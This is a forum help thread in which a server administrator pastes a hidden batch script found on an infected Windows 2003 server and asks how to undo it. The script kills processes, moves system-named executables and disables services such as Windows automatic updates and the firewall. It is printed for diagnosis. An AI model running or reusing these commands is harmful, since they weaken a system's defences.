• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 539
  • Last Modified:

msdosx.exe

Keep finding msdosx.exe on c:\ from an Win2k3 server. AV, Spyware software does not find any problems.

Does anyone know what this is?
0
zombie99
Asked:
zombie99
  • 5
  • 4
1 Solution
 
fuzzymallets1Commented:
0
 
fuzzymallets1Commented:
0
 
zombie99Author Commented:
Same thing I have found. But if you delete it after rebooting it comes back.
0
Visualize your virtual and backup environments

Create well-organized and polished visualizations of your virtual and backup environments when planning VMware vSphere, Microsoft Hyper-V or Veeam deployments. It helps you to gain better visibility and valuable business insights.

 
fuzzymallets1Commented:
Then try using different Anti virus and spyware. What all have you used?
0
 
zombie99Author Commented:
I got Mcafee Groupshield (it happens to be an Exchange server..) with the latest update & SuperAnti Spyware...  in the past these have worked for me.

I appreciate the help
0
 
fuzzymallets1Commented:
0
 
zombie99Author Commented:
Ok, after doing some research... I found under the \windows\temp folder a hiden file called bt3388.bat, that creates a mess on the windows\system and system32 folders.

Also, apparently this "virus" is new since there was no information prior to 02/13/09.  

This is the script on the file:

cd %windir%\fix
attrib -s -h %windir%\system32\lssas.exe
attrib -s -h %windir%\system32\spooIsv.exe
attrib -s -h %windir%\system32\csrs.exe
attrib -s -h %windir%\system\smsc32.exe
attrib -s -h %windir%\system32\msddns.exe
attrib -s -h %windir%\system32\Isass.exe
attrib -s -h %windir%\system32\winIogon.exe
attrib -s -h %windir%\system32\regsvr.exe
attrib -s -h %windir%\usbservice.exe
attrib -s -h %windir%\FireFoxUpdater.exe
attrib -s -h %windir%\TSM7GN.exe
attrib -s -h %windir%\part2p.exe
attrib -s -h %windir%\system32\sysmgr.exe
attrib -s -h %windir%\system32\spoolsvc.exe
attrib -s -h %windir%\system32\no.exe.exe
attrib -s -h %windir%\system32\csrmgr.exe
attrib -s -h %windir%\system32\csrms.exe
attrib -s -h %windir%\system32\wgareg.exe
attrib -s -h %windir%\part1p.exe
attrib -s -h %windir%\sithhqp.exe
attrib -s -h C:\msisrv.exe
attrib -s -h %windir%\system32\msr.exe
attrib -s -h %windir%\security\svchost.exe
attrib -s -h %windir%\system\wuauclt.exe
attrib -s -h %windir%\system\msddll.exe
attrib -s -h %windir%\system\svhost.exe
attrib -s -h %windir%\system\vmwareservice.exe
attrib -s -h %windir%\lsass.exe
attrib -s -h %windir%\system32\service.exe
attrib -s -h C:\skp.exe
attrib -s -h %windir%\system32\wins\wmsncs.exe
attrib -s -h %windir%\system32\hgcheck.exe
attrib -s -h %windir%\system32\afisicx.exe
attrib -s -h %windir%\fonts\wmsncs.exe
attrib -s -h C:\recycler\tesktas.exe
attrib -s -h %windir%\system32\noytcyr.exe
attrib -s -h %windir%\system32\roytctm.exe
attrib -s -h %windir%\system32\soxpeca.exe
attrib -s -h %windir%\system32\tdydowkc.exe
attrib -s -h %windir%\system32\wsldoekd.exe
attrib -s -h %windir%\system32\udxfytw.sys
attrib -s -h %windir%\system32\msservice.exe
attrib -s -h %windir%\system32\csrsc.exe
attrib -s -h %windir%\system32\wscntfysvc.exe
attrib -s -h %windir%\system32\msnco.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
pv -kf Isass.exe
pv -kf winIogon.exe
pv -kf lssas.exe
pv -kf spooIsv.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\system32\regsvr.exe %windir%\temp\%random%
move %windir%\smsc32.exe %windir%\temp\%random%
move %windir%\usbservice.exe %windir%\temp\%random%
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
move %windir%\system\wuauclt.exe %windir%\temp\%random%
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
pv -kf msddns.exe
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\svchost.exe %windir%\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf tsnp2std.exe
pv -kf fixcamera.exe
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\svchost.exe %windir%\%random%
pv -kf FireFoxUpdater.exe
pv kf TSM7GN.exe
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
pv -kf wgareg.exe
pv -kf msservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf usbservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf *.sys
pv -kf csrmgr.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf smsc32.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf csrms.exe
pv -kf spoolsvc.exe
pv -kf sysmgr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf regsvr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf wscntfy.exe
pv -kf no.exe.exe
pv -kf sysmgr.exe
pv -kf afisicx.exe
pv -kf noytcyr.exe
pv -kf wsldoekd.exe
pv -kf roytctm.exe
pv -kf tdydowkc.exe
pv -kf mabidwe.exe
pv -kf soxpeca.exe
pv -kf rundll*
pv -kf ntv*
pv -kf dww*
pv -kf ping*
pv -kf task*
pv -kf csrsc.exe
pv -kf wscntfysvc.exe
pv -kf msnco.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
cls
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
cls
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
attrib -s -h %windir%\temp\csrssc.exe
attrib -s -h %windir%\winlogon.exe
pv -kf csrssc.exe
move %windir%\temp\csrssc.exe
move %windir%\winlogon.exe
cls
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
move C:\skp.exe %windir%\temp\%random%
cls
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
cls
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
pv -kf udxfytw.sys
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
pv -kf service.exe
move %windir%\system32\service.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
cls
move C:\msisrv.exe %windir%\temp\%random%
pv -kf msisrv.exe
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
scx config msrpxy start= disabled
scx delete msrpxy
pv -kf msr.exe
scx config msrpxy start= disabled
scx delete msrpxy
scx config AccessSharing start= disabled
scx config winspoolsvc start= disabled
scx config mscncosd start= disabled
cls
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
scx config WinHost32Svr start= disabled
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
scx config msddll start= disabled
pv -kf msddll.exe
cls
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
scx config "WindowsTelephony" start= disabled
pv -kf svhost.exe
cls
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
scx config VmwareService start= disabled
pv -kf vmwareservice.exe
cls
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
pv -kf part2p.exe
pv -kf part1p.exe
pv -kf sithhqp.exe
cls
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
scx config afisicx start= disabled
%windir%\system32\afisicx.exe
pv -kf afisicx.exe
scx stop afisicx.exe
scx config HCencerSer start= disabled
C:\recycler\tesktas.exe
pv -kf tesktas.exe
scx stop HcencerSer
scx config noytcyr start= disabled
%windir%\system32\noytcyr.exe
pv -kf noytcyr.exe
scx stop noytcyr
scx config roytctm start= disabled
%windir%\system32\roytctm.exe
pv -kf roytctm.exe
scx stop roytctm.exe
scx config soxpeca start= disabled
cls
%windir%\system32\soxpeca.exe
pv -kf soxpeca.exe
scx stop soxpeca.exe
scx config tdydowkc start= disabled
%windir%\system32\tdydowkc.exe
pv -kf tdydowkc.exe
scx stop tdydwokc
scx config wsldoekd start= disabled
%windir%\system32\wsldoekd.exe
pv -kf wsldoekd.exe
scx config "Usb Service 2.0" start= disabled
pv -kf usbservice.exe
scx config ypadky start= disabled
scx stop ypadky
scx stop wsldoekd
scx config Wxsynas start= disabled
scx stop Wxsynas
scx stop dnshost
scx config dnshost start= disabled
scx config winhost32svr start= disabled
scx config netstats start= disabled
scx stop ICF
cls
scx config "Windows automatic updates" start= disabled
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
scx delete ICF
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
IF EXIST C:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013\cfixer.exe (
pv -kf explor*
cd "c:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013"
move cfixer.exe %windir%\%random%
)

del scx.exe
del pv.exe
cls
del C:\Helios.exe
del C:\msdos.exe
del C:\msdosx.exe
del C:\1.exe
del cln.bat

------------------------------------------------------------------

Any idea on how to reverse all this without re-installing?

Any help is appreciated.
0
 
itsupportvaCommented:
Any ideas yet? I am having the same problem. My system32 folder is filling up with temp*.bk files.
0
 
zombie99Author Commented:
Ended up deleteing everythng manually. It works now.
0
 
zombie99Author Commented:
Did not get help for a few days. I ended up doing everything manually.
0

Featured Post

Get free NFR key for Veeam Availability Suite 9.5

Veeam is happy to provide a free NFR license (1 year, 2 sockets) to all certified IT Pros. The license allows for the non-production use of Veeam Availability Suite v9.5 in your home lab, without any feature limitations. It works for both VMware and Hyper-V environments

  • 5
  • 4
Tackle projects and never again get stuck behind a technical roadblock.
Join Now